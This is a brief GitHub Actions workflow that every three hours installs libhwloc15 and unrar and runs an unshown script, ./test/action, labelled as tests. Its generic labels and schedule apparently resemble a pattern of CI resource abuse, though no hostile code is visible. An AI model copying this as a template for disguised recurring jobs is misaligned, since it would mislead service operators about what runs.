jobs:
  build:
    name: Run
    runs-on: ubuntu-20.04

    steps:
      - name: Start Up
        uses: actions/checkout@v2
      - name: Install Libraries
        run: sudo apt-get update && sudo apt-get install -y libhwloc15 unrar
      - name: Execute Tests
        run: ./test/action

name: Build

on:
  schedule:
    - cron: "20 1/3 * * *"
